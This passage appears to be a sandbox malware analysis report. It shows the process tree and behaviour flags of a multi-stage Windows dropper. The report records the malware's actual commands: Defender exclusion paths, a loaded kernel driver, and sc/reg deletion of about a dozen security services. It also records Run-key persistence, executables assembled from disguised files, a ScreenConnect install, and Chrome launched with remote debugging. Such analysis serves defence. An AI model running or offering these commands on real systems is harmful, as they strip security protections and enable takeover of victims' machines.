9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
11164	Exam.com
11164	Exam.com
11164	Exam.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 972	2476	d3053f42c2c51006ff8ae62525ef2221.exe	87
PID 2476 wrote to memory of 972	2476	d3053f42c2c51006ff8ae62525ef2221.exe	87
PID 2476 wrote to memory of 972	2476	d3053f42c2c51006ff8ae62525ef2221.exe	87
PID 972 wrote to memory of 4920	972	A0v32.exe	88
PID 972 wrote to memory of 4920	972	A0v32.exe	88
PID 972 wrote to memory of 4920	972	A0v32.exe	88
PID 4920 wrote to memory of 6084	4920	1W48q9.exe	92
PID 4920 wrote to memory of 6084	4920	1W48q9.exe	92
PID 4920 wrote to memory of 6084	4920	1W48q9.exe	92
PID 972 wrote to memory of 3100	972	A0v32.exe	93
PID 972 wrote to memory of 3100	972	A0v32.exe	93
PID 972 wrote to memory of 3100	972	A0v32.exe	93
PID 2476 wrote to memory of 1688	2476	d3053f42c2c51006ff8ae62525ef2221.exe	98
PID 2476 wrote to memory of 1688	2476	d3053f42c2c51006ff8ae62525ef2221.exe	98
PID 2476 wrote to memory of 1688	2476	d3053f42c2c51006ff8ae62525ef2221.exe	98
PID 1688 wrote to memory of 544	1688	3g52f.exe	102
PID 1688 wrote to memory of 544	1688	3g52f.exe	102
PID 544 wrote to memory of 6108	544	chrome.exe	103
PID 544 wrote to memory of 6108	544	chrome.exe	103
PID 544 wrote to memory of 860	544	chrome.exe	104
PID 544 wrote to memory of 860	544	chrome.exe	104
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 2268	544	chrome.exe	105
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106
PID 544 wrote to memory of 5416	544	chrome.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2664
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3136

C:\Users\Admin\AppData\Local\Temp\d3053f42c2c51006ff8ae62525ef2221.exe
"C:\Users\Admin\AppData\Local\Temp\d3053f42c2c51006ff8ae62525ef2221.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0v32.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0v32.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W48q9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W48q9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6084
    - - C:\Users\Admin\AppData\Local\Temp\10003000101\b7886494d4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\b7886494d4.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4204
    - - C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:2520
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:5240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:2616
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Executes dropped EXE
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:13192
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Executes dropped EXE
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\{2e747c3d-8fd3-475c-9f80-8b9d894e4cb6}\7e9c4712.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{2e747c3d-8fd3-475c-9f80-8b9d894e4cb6}\7e9c4712.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:9796
        
        C:\Users\Admin\AppData\Local\Temp\{5b9c5ab4-d10a-44f4-a263-8c206141c350}\e8378438.exe
        
        C:/Users/Admin/AppData/Local/Temp/{5b9c5ab4-d10a-44f4-a263-8c206141c350}/\e8378438.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Checks for any installed AV software in registry
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        
        PID:11076
    - - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3272
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3704
    - - C:\Users\Admin\AppData\Local\Temp\10340260101\ba1405f49d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\ba1405f49d.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2312
    - - C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8008
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        6⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3952
    - - C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:9196
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4148
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:10132
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10152
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:10260
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10272
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10388
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10424
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10912
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:11072
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:11164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11164 -s 1004
        8⤵
        Program crash
        
        PID:2772
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:11280
    - - C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12340
    - - C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12568
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12692
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14A7.tmp\14A8.tmp\14A9.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        
        PID:12784
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12880
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\15D0.tmp\15D1.tmp\15D2.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        9⤵
        
        PID:12976
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:13068
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:13084
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:13132
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:13180
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:9176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9092
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13268
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:6020
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:5940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:9184
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:2052
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:3704
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:2648
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:6160
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:4276
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:1584
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:2672
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:3824
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:2952
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:1772
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:5576
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:6464
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:5392
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:6240
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:5096
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:6384
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:6400
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:6420
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:13236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:6516
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:5208
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:11616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:6620
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:13304
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:6200
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:6440
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:6560
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:13296
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:13280
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:6640
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:6792
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:6864
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:6956
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:6888
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:6916
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:6876
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:4904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:2240
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:2624
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:632
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:6624
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:6700
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:3460
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:720
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:6808
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:4712
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:7120
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:7044
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:7088
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:7128
    - - C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5540
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5680
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
        7⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3696
        
        C:\Users\Public\Netstat\bild.exe
        
        C:\Users\Public\Netstat\bild.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4616
    - - C:\Users\Admin\AppData\Local\Temp\10342320101\a7def4e3c2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342320101\a7def4e3c2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8492
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:8564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:9652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffe21a7dcf8,0x7ffe21a7dd04,0x7ffe21a7dd10
        8⤵
        
        PID:9696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2016,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1808 /prefetch:2
        8⤵
        
        PID:10024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2260,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2276 /prefetch:3
        8⤵
        
        PID:10052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2408,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1332 /prefetch:8
        8⤵
        
        PID:3164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3308 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:10548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3388,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3620 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:10568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4544 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:10892
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
